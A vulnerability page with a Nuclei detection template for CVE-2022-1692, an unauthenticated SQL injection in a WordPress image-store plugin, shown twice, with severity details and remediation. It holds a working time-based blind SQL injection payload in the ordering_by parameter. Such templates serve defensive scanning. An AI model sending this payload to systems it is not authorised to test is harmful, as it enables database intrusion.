CP Image Store with Slideshow <= 1.0.67 - SQL Injection

CVE-2022-1692

Verified

Description

The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack.

Severity

Critical

CVSS Score

9.8

Exploit Probability

73%

Published Date

February 26, 2026

Template Author

shivam kamboj

CVE-2022-1692.yaml

id: CVE-2022-1692

info:
  name: CP Image Store with Slideshow <= 1.0.67 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  remediation: |
    Update to version 1.0.68 or later.
  reference:
    - https://wpscan.com/vulnerability/83bae80c-f583-4d89-8282-e6384bbc7571/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cp-image-store/cp-image-store-with-slideshow-1067-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1692
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1692
    epss-score: 0.73448
    epss-percentile: 0.98823
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,cp-image-store,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/?s=codepeople-image-store&post_type=page&feed=rss2"

    matchers:
      - type: word
        words:
          - '<item>'
        internal: true

    extractors:
      - type: regex
        name: path
        regex:
          - '<link>https?://[^/]+(/[a-zA-Z0-9][^<]*)</link>'
        group: 1
        internal: true

  - method: GET
    path:
      - "{{RootURL}}{{path}}?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20"

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'contains(body, "cpis_image=")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502210087c357a879960b0180907a747f5b42e8ed48c9e994b7820a77ed3facd333227802202f867935a919ed33774b7a3828995408c97ab1f673d6260ab11c8615223370e9:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2022-1692

CWE ID:

cwe-89

References

https://wpscan.com/vulnerability/83bae80c-f583-4d89-8282-e6384bbc7571/https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cp-image-store/cp-image-store-with-slideshow-1067-unauthenticated-sql-injection https://nvd.nist.gov/vuln/detail/CVE-2022-1692

Remediation Steps

Update to version 1.0.68 or later.

id: CVE-2022-1692

info:
  name: CP Image Store with Slideshow <= 1.0.67 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The CP Image Store with Slideshow WordPress plugin before 1.0.68 does not sanitise and escape the ordering_by query parameter before using it in a SQL statement in pages where the [codepeople-image-store] is embed, allowing unauthenticated users to perform an SQL injection attack.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  remediation: |
    Update to version 1.0.68 or later.
  reference:
    - https://wpscan.com/vulnerability/83bae80c-f583-4d89-8282-e6384bbc7571/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cp-image-store/cp-image-store-with-slideshow-1067-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1692
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1692
    epss-score: 0.73448
    epss-percentile: 0.98823
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,cp-image-store,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/?s=codepeople-image-store&post_type=page&feed=rss2"

    matchers:
      - type: word
        words:
          - '<item>'
        internal: true

    extractors:
      - type: regex
        name: path
        regex:
          - '<link>https?://[^/]+(/[a-zA-Z0-9][^<]*)</link>'
        group: 1
        internal: true

  - method: GET
    path:
      - "{{RootURL}}{{path}}?ordering_by=post_title%20DESC%2C(SELECT%209143%20FROM%20(SELECT(SLEEP(8)))cFAm)--%20"

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'contains(body, "cpis_image=")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502210087c357a879960b0180907a747f5b42e8ed48c9e994b7820a77ed3facd333227802202f867935a919ed33774b7a3828995408c97ab1f673d6260ab11c8615223370e9:922c64590222798bb761d5b6d8e72950

CP Image Store with Slideshow <= 1.0.67 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

CP Image Store with Slideshow <= 1.0.67 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps